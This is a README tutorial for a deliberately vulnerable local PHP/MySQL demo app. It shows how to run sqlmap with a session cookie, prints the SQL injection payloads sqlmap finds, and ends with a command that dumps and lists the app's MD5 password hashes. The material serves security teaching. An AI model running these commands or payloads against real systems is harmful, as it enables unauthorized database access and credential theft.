# VULN - Example of the vulnerable application prone to SQL Injection attack using sqlmap

This tutorial uses docker containers and docker-compose for orchestration

## Prerequisites

1. Install docker for your platform
2. Install docker-compose
3. Install sqlmap

## Instructions

- Clone this repository:

`git clone https://gitlab.com/harveydanger/vuln-demo.git; cd vuln-demo`

- Run docker-compose in a cloned repository
  
`docker-compose up`

This will create 2 containers: vuln-db and vuln-web

### vuln-db

This is a mysql server image that is seeded by `sql/seed.sql` file.

### vuln-web

Docker container mounts volume to the `php` folder in this repo. So you can have a closer look at the actual code behind the web application.

### How to restart

To restart the set and rebuild:

`docker-compose down; docker-compose build && docker-compose up`

## Steps to exploit SQLi with sqlmap

1. Once containers up and running, navigate to 127.0.0.1:8888
2. Register within the app
3. Login with created user account
4. Try playing with inputs. e.g. create post etc.
5. in your browser [Chrome or any other browser, should be similar] Open `dev-tools -> Application -> Cookies`
6. Copy `PHPSESSID`, this will be used to automate injection
7. Open terminal
8. Run `sqlmap -u http://127.0.0.1:8888/create-post.php --cookie="PHPSESSID=session_cookie_here" --forms --crawl=2` ***change cookie to the previously obtained value in step 6***

At this stage, sqlmap will ask several questions:

- do you want to check for the existence of site's sitemap(.xml) [y/N] `n` - not the point of this example

```text
[14:54:40] [INFO] starting crawler for target URL 'http://127.0.0.1:8888/create-post.php'
[14:54:40] [INFO] searching for links with depth 1
[14:54:40] [INFO] 1/2 links visited (50%)
```

- got a 302 redirect to 'http://127.0.0.1:8888/login.php'. Do you want to follow? [Y/n] `n`

- do you want to normalize crawling results [Y/n] `y`

- do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] `y`

```text
[14:54:48] [INFO] writing crawling results to a temporary file '/var/folders/9_/9j5jr00n6rs53rxvk3tqbl5c0000gn/T/sqlmapbeDTpm28990/sqlmapcrawler-Fzt1iV.csv' 

```

```text
[#1] form:
POST http://127.0.0.1:8888/create-post.php
Cookie: PHPSESSID=61ac1970163ea154393f29fa86a5c5f0
POST data: title=&message=
```

- do you want to test this form? [Y/n/q] `y`

- Edit POST data [default: title=&message=] (Warning: blank fields detected): `hit enter`

- do you want to fill blank fields with random values? [Y/n] `y`
  
```text
[14:54:51] [INFO] resuming back-end DBMS 'mysql' 
[14:54:51] [INFO] using '/path/results-04092021_0254pm.csv' as the CSV results file in multiple targets mode
```

- got a 302 redirect to 'http://127.0.0.1:8888/welcome.php'. Do you want to follow? [Y/n] `n`

At this stage, sqlmap will try different techniques to exploit sqli vulnerability.

After running for a few seconds, sqlmap will dump available exploits. e.g.

```text
sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests:
---
Parameter: title (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: title=tPmt" RLIKE (SELECT (CASE WHEN (3195=3195) THEN 0x74506d74 ELSE 0x28 END)) AND "BrKb"="BrKb&message=

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: title=tPmt" AND EXTRACTVALUE(1796,CONCAT(0x5c,0x7171717071,(SELECT (ELT(1796=1796,1))),0x7162787071)) AND "FVSU"="FVSU&message=

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: title=tPmt" RLIKE SLEEP(5) AND "dOhZ"="dOhZ&message=

Parameter: message (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: title=tPmt&message="="" AND GTID_SUBSET(CONCAT(0x7171717071,(SELECT (ELT(2266=2266,1))),0x7162787071),2266) AND ""="

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=tPmt&message="="" AND (SELECT 1710 FROM (SELECT(SLEEP(5)))jddw) AND ""="
---
```

Repeat steps with flags `--dbs`, `--tables` etc. [see sqlmap manual for details]

## Finally

Run exploit and fetch user passwords.
`sqlmap -u http://127.0.0.1:8888/create-post.php --cookie="PHPSESSID=[insert_session_id]" --forms --crawl=2 -D vuln -T users -C password --dump`

```text
[14:54:56] [INFO] fetching entries of column(s) 'password' for table 'users' in database 'vuln'
[14:54:56] [WARNING] reflective value(s) found and filtering out
[14:54:56] [INFO] retrieved: '2467d3744600858cc9026d5ac6005305'
[14:54:56] [INFO] retrieved: '2467d3744600858cc9026d5ac6005305'
[14:54:56] [INFO] retrieved: '3efd0f8070d00d486bde2d8369d2e6fc'
[14:54:56] [INFO] retrieved: '5f4dcc3b5aa765d61d8327deb882cf99'
[14:54:56] [INFO] retrieved: 'fc16fc3cea94895ceb0ba213ceea75de'
[14:54:56] [INFO] recognized possible password hashes in column 'password'
```

sqlmap will generously ask you if you want to crack em.

Please note that this example uses not secure MD5 algo to hash passwords, thus cracking is fast.
